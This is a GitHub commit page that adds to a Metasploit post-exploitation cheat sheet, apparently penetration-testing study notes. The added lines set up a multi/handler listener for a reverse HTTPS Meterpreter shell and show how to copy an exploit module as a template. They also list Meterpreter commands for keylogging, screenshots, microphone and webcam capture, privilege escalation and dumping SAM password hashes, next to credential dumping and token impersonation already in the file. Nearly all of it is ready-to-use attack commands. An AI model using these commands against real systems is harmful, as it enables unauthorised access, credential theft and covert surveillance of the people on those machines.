Skip to content

Commit 83a73a4

Browse files
adding what needs to be in here
1 parent aa78ef3 commit 83a73a4

File tree

1 file changed

+36
-1
lines changed

1 file changed

+36
-1
lines changed

Cheatsheet_MSFPostExploitation.txt

+36-1
Original file line numberDiff line numberDiff line change
@@ -23,4 +23,39 @@ meterpreter > wdigest
2323
meterpreter > use incognito
2424
meterpreter > list_tokens -u
2525
meterpreter > impersonate_token SERV-2K3\\Administrator
26-
execute -f cmd.exe -i -t
26+
execute -f cmd.exe -i -t
27+
28+
Metasploit Exploit Multi Handler
29+
30+
multi/handler to accept an incoming reverse\_https\_meterpreter
31+
32+
`payload
33+
use exploit/multi/handler
34+
set PAYLOAD windows/meterpreter/reverse_https
35+
set LHOST $ip
36+
set LPORT 443
37+
exploit
38+
[*] Started HTTPS reverse handler on https://$ip:443/`
39+
40+
Building Your Own MSF Module
41+
42+
`mkdir -p ~/.msf4/modules/exploits/linux/misc
43+
cd ~/.msf4/modules/exploits/linux/misc
44+
cp
45+
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
46+
./crossfire.rb
47+
nano crossfire.rb`
48+
49+
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
50+
51+
`download` Download a file or directory
52+
`upload` Upload a file or directory
53+
`portfwd` Forward a local port to a remote service
54+
`route` View and modify the routing table
55+
`keyscan_start` Start capturing keystrokes
56+
`keyscan_stop` Stop capturing keystrokes
57+
`screenshot` Grab a screenshot of the interactive desktop
58+
`record_mic` Record audio from the default microphone for X seconds
59+
`webcam_snap` Take a snapshot from the specified webcam
60+
`getsystem` Attempt to elevate your privilege to that of local system.
61+
`hashdump` Dumps the contents of the SAM database

0 commit comments

Comments
 (0)